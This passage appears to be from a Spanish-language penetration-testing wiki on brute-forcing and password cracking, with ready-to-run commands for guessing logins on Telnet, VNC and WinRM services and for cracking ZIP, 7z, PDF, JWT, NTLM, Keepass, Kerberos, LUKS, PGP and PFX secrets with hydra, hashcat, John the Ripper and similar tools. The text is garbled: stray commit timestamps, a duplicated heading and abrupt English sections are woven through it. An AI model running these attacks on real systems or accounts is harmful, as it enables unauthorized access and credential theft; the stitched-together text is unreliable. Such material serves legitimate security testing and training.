Telnet es un protocolo de red que permite la comunicación bidireccional a través de una conexión de red. Es comúnmente utilizado en pruebas de penetración para realizar ataques de fuerza bruta contra servicios que utilizan Telnet para autenticación.
2023-06-05 18:52:52 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
2023-06-05 18:52:52 +00:00
```
### VNC
2024-04-06 18:13:31 +00:00
Virtual Network Computing (VNC) es un sistema que te permite ver la pantalla de un ordenador remoto y controlarlo a través de la red.
2023-06-05 18:52:52 +00:00
```bash
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
legba vnc --target localhost:5901 --password data/passwords.txt
2023-06-05 18:52:52 +00:00
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
```
### Winrm
2024-04-06 18:13:31 +00:00
Winrm es un protocolo de administración remota que permite a los usuarios controlar y administrar sistemas Windows de forma remota.
2023-06-05 18:52:52 +00:00
```bash
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
```
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Utilice [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
Obtenga acceso hoy:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2023-06-05 18:52:52 +00:00
## Local
### Bases de datos de cracking en línea
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 y SHA1)
* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 con/sin ESS/SSP y con cualquier valor de desafío)
2023-06-05 18:52:52 +00:00
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, capturas WPA2 y archivos MSOffice, ZIP, PDF...)
* [https://crackstation.net/](https://crackstation.net) (Hashes)
* [https://md5decrypt.net/](https://md5decrypt.net) (MD5)
* [https://gpuhash.me/](https://gpuhash.me) (Hashes y hashes de archivos)
* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes)
* [https://www.cmd5.org/](https://www.cmd5.org) (Hashes)
* [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5)
* [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
Revise esto antes de intentar hacer un ataque de fuerza bruta a un Hash.
2023-06-05 18:52:52 +00:00
### ZIP
```bash
#sudo apt-get install fcrackzip
2023-06-05 18:52:52 +00:00
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
```
```bash
zip2john file.zip > zip.john
john zip.john
```
```bash
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
```
#### Ataque de fuerza bruta de texto plano conocido en archivos zip
2023-06-05 18:52:52 +00:00
Necesitas conocer el **texto plano** (o parte del texto plano) **de un archivo contenido dentro** del zip encriptado. Puedes verificar **los nombres de archivo y el tamaño de los archivos contenidos dentro** de un zip encriptado ejecutando: **`7z l encrypted.zip`**\
Descarga [**bkcrack**](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0) desde la página de lanzamientos.
2023-06-05 18:52:52 +00:00
```bash
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
2023-06-05 18:52:52 +00:00
unzip unlocked.zip #User new_pwd as password
```
### 7z
2023-06-05 18:52:52 +00:00
### 7z
```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```
```bash
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```
### PDF
La técnica de fuerza bruta es un enfoque común para descifrar contraseñas de archivos PDF protegidos. Puedes usar herramientas como **pdfcrack** o **John the Ripper** para realizar ataques de fuerza bruta contra archivos PDF. Estas herramientas intentarán todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Es importante tener en cuenta que la fuerza bruta puede llevar mucho tiempo, especialmente si la contraseña es larga y compleja.
2023-06-05 18:52:52 +00:00
```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
```
### Contraseña del Propietario de PDF
2023-06-05 18:52:52 +00:00
Para crackear una contraseña del propietario de PDF, revisa esto: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
2023-06-05 18:52:52 +00:00
### JWT
```bash
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
```
### Descifrado de NTLM
2023-06-05 18:52:52 +00:00
```bash
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
### Keepass
```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
### Keberoasting
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
### Imagen de Lucks
2023-06-05 18:52:52 +00:00
#### Método 1
Instalar: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
#### Método 2
```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
Otro tutorial de BF de Luks: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
2023-06-05 18:52:52 +00:00
### Mysql
2023-06-05 18:52:52 +00:00
```bash
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```
### Clave privada PGP/GPG
```bash
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```
### Cisco
<figure><img src="../.gitbook/assets/image (660).png" alt=""><figcaption></figcaption></figure>
2023-06-05 18:52:52 +00:00
### Clave maestra de DPAPI
2023-06-05 18:52:52 +00:00
Utiliza [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) y luego john
2023-06-05 18:52:52 +00:00
### Columna protegida por contraseña de Open Office
2023-06-05 18:52:52 +00:00
Si tienes un archivo xlsx con una columna protegida por una contraseña, puedes desprotegerla:
2023-06-05 18:52:52 +00:00
* **Súbelo a Google Drive** y la contraseña se eliminará automáticamente
* Para **eliminarla** de forma **manual**:
2023-06-05 18:52:52 +00:00
```bash
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
```
### Certificados PFX
```bash
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
2023-06-05 18:52:52 +00:00
\
Utilice [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias más avanzadas del mundo.\
Obtenga acceso hoy:
2023-06-05 18:52:52 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Herramientas
**Ejemplos de hash:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
2023-06-05 18:52:52 +00:00
### Identificador de hash
2023-06-05 18:52:52 +00:00
```bash
hash-identifier
> <HASH>
```
### Listas de palabras
* **Rockyou**
* [**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)
* [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)
* [**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)
2023-06-05 18:52:52 +00:00
### **Herramientas de generación de listas de palabras**
2023-06-05 18:52:52 +00:00
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Generador avanzado de secuencias de teclado con caracteres base configurables, mapa de teclas y rutas.
2023-06-05 18:52:52 +00:00
```bash
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
```
### Mutación de John
Leer _**/etc/john/john.conf**_ y configurarlo
2023-06-05 18:52:52 +00:00
```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
### Hashcat
#### Ataques de Hashcat
* **Ataque de lista de palabras** (`-a 0`) con reglas
2023-06-05 18:52:52 +00:00
**Hashcat** ya viene con una **carpeta que contiene reglas** pero puedes encontrar [**otras reglas interesantes aquí**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
2023-06-05 18:52:52 +00:00
```
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
* **Ataque de combinación de listas de palabras**
2023-06-05 18:52:52 +00:00
Es posible **combinar 2 listas de palabras en 1** con hashcat.\
Si la lista 1 contenía la palabra **"hello"** y la segunda contenía 2 líneas con las palabras **"world"** y **"earth"**. Se generarán las palabras `helloworld` y `helloearth`.
2023-06-05 18:52:52 +00:00
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
```
* **Ataque de máscara** (`-a 3`)
```bash
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
```
* Ataque de Wordlist + Máscara (`-a 6`) / Ataque de Máscara + Wordlist (`-a 7`)
2023-06-05 18:52:52 +00:00
```bash
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
```
#### Modos de Hashcat
```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
## Brute Forcing
### Introduction
Brute forcing is a common technique used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. In the context of cracking Linux hashes from the `/etc/shadow` file, brute forcing involves generating potential passwords and hashing them using the same algorithm as the one used in Linux to create the hash. These hashes are then compared with the target hash to find a match.
### Tools and Resources
There are various tools and resources available for brute forcing Linux hashes, such as:
- **John the Ripper**: A popular password cracking tool that can be used for brute forcing Linux hashes.
- **Hashcat**: Another powerful tool for password cracking that supports various hash algorithms used in Linux.
- **CrackStation**: An online database that can be used to compare hashes and find matching passwords.
- **Wordlists**: Text files containing a list of commonly used passwords or dictionary words that can be used for brute forcing.
### Methodology
The general steps involved in brute forcing Linux hashes from the `/etc/shadow` file are as follows:
1. **Obtain the Hash**: Extract the hash of the target user from the `/etc/shadow` file.
2. **Choose a Tool**: Select a suitable password cracking tool such as John the Ripper or Hashcat.
3. **Generate Password Candidates**: Use wordlists, rules, or custom scripts to generate potential passwords.
4. **Hash the Passwords**: Hash the generated passwords using the same algorithm as the target hash.
5. **Compare Hashes**: Compare the generated hashes with the target hash to find a match.
6. **Crack the Password**: Once a match is found, the corresponding password is cracked.
### Conclusion
2024-04-06 18:13:31 +00:00
Brute forcing Linux hashes from the `/etc/shadow` file can be a time-consuming process, especially for complex passwords. It is essential to use strong wordlists and rules to increase the chances of success. Additionally, leveraging the power of tools like John the Ripper and Hashcat can significantly speed up the cracking process.
2023-06-05 18:52:52 +00:00
```
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2023-06-05 18:52:52 +00:00
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
# Fuerza bruta
2024-04-06 18:13:31 +00:00
La fuerza bruta es un método comúnmente utilizado para descifrar contraseñas. Consiste en probar todas las combinaciones posibles de caracteres hasta encontrar la contraseña correcta. En el contexto de las contraseñas de Windows, la fuerza bruta se puede utilizar para descifrar hashes de contraseñas almacenados localmente en un sistema Windows. Una vez que se obtiene el hash de la contraseña, se pueden utilizar herramientas como John the Ripper o Hashcat para realizar el ataque de fuerza bruta y descifrar la contraseña original. Es importante tener en cuenta que la fuerza bruta puede ser un proceso lento y consumir muchos recursos computacionales, especialmente si la contraseña es larga y compleja.
2023-06-05 18:52:52 +00:00
```
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
## Brute Force
### Introduction
Brute force attacks are a common method used to crack passwords by systematically trying all possible combinations until the correct one is found. This technique can also be used to crack common application hashes.
### Methodology
1. **Identify Hash Algorithm**: Determine the hash algorithm used by the application to generate the hashes.
2. **Generate Wordlist**: Create a wordlist containing common passwords, dictionary words, and variations.
3. **Hash Wordlist**: Hash the wordlist using the same algorithm as the application.
2024-04-06 18:13:31 +00:00
4. **Compare Hashes**: Compare the generated hashes with the target application hashes.
5. **Brute Force Attack**: Use a tool like Hashcat or John the Ripper to systematically brute force the hashes using the hashed wordlist.
6. **Crack Password**: Once a match is found, the corresponding password is cracked.
### Resources
- Hashcat: [https://hashcat.net/](https://hashcat.net/)
- John the Ripper: [https://www.openwall.com/john/](https://www.openwall.com/john/)
2023-06-05 18:52:52 +00:00
```
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
2023-06-05 18:52:52 +00:00
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
2023-06-05 18:52:52 +00:00
```
<details>
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Equipos Rojos de AWS de HackTricks)</strong></a><strong>!</strong></summary>
2023-06-05 18:52:52 +00:00
Otras formas de apoyar a HackTricks:
* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.
2023-06-05 18:52:52 +00:00
</details>
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
2023-06-05 18:52:52 +00:00
\
Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias **más avanzadas** del mundo.\
¡Accede hoy mismo:
2023-06-05 18:52:52 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}